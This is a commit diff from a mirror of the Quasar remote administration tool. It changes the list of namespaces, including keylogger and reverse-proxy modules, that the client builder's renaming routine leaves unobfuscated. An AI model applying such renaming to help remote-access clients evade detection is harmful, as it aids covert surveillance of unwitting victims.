mirror of https://github.com/quasar/Quasar.git
parent
8284da5830
commit
1e0a1d8b2c
|
@ -59,13 +59,14 @@ public bool Perform()
|
||||||
private void RenameInType(TypeDefinition typeDef)
|
private void RenameInType(TypeDefinition typeDef)
|
||||||
{
|
{
|
||||||
if (typeDef.Namespace.StartsWith("My")
|
if (typeDef.Namespace.StartsWith("My")
|
||||||
|| typeDef.Namespace.StartsWith("xClient.Core.Packets")
|
|
||||||
|| typeDef.Namespace == "xClient.Core"
|
|| typeDef.Namespace == "xClient.Core"
|
||||||
|| typeDef.Namespace == "xClient.Core.Elevation"
|
|| typeDef.Namespace == "xClient.Core.Elevation"
|
||||||
|| typeDef.Namespace == "xClient.Core.Compression"
|
|| typeDef.Namespace == "xClient.Core.Compression"
|
||||||
|
|| typeDef.Namespace == "xCore.Client.Networking"
|
||||||
|| typeDef.Namespace.StartsWith("ProtoBuf")
|
|| typeDef.Namespace.StartsWith("ProtoBuf")
|
||||||
|| typeDef.Namespace.Contains("xClient.Core.ReverseProxy")
|
|| typeDef.Namespace.StartsWith("xClient.Core.ReverseProxy")
|
||||||
|| typeDef.Namespace.Contains("xClient.Core.Keylogger")
|
|| typeDef.Namespace.StartsWith("xClient.Core.Keylogger")
|
||||||
|
|| typeDef.Namespace.StartsWith("xClient.Core.Packets")
|
||||||
|| typeDef.HasInterfaces)
|
|| typeDef.HasInterfaces)
|
||||||
return;
|
return;
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue